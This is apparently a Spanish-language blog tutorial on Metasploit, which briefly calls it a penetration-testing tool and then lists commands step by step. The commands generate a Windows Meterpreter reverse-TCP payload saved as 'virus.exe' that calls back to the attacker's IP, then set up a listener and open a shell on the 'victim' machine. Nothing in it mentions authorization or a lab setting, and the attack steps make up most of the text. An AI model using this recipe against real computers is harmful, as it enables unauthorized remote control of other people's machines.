Bueno lo primero que de demos saber, es que metasploit es una herramienta de penetración de código libre, desarrollado para ejecutar exploits a un objetivo remoto. Metasploit cuenta con la mayor base de datos de exploits públicos y probados y puede ser usado para detectar las vulnerabilidades de nuestros sistemas para protegerlos o usar esas vulnerabilidades para obtener acceso a sistemas remotos. Es una herramienta bastante poderosa para los test de penetración y es algo que todo profesional de seguridad debe dominar. Puede ser un poco complicado al inicio pero todo es cuestión de paciencia y dedicación.
bueno ahora si empecemos.
lo primero que debemos hacer es abrir una terminal y poner
>> msfconsole
recuerden que con eso se abre la terminal de metasploit.
>> msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.x.x LPORT=4444 x> Desktop/virus.exe
>> use exploit/multi/handler
hay lo que hacemos es definir el exploit que se usara para
el ataque.
>> set payload windows/meterpreter/reverse_tcp
* aquí configuramos o seleccionamos el payload que se utilizara.
>> set LHOST 192.168.x.x
Configuramos la IP del atacante.
>> exploit -j -z
Inicia el ataque en modo escucha en segundo plano.
>> sessions -l
Nos mostrara las sesiones establecidas.
>> sessions -i (id)
Escogemos el equipo victima por medio del id,
que nos da en el paso anterior.
>> shell
Bueno espero que les sirva la información, y los
invito a dejar sus comentarios.
Probado 03/07/2015
Comentarios
Publicar un comentario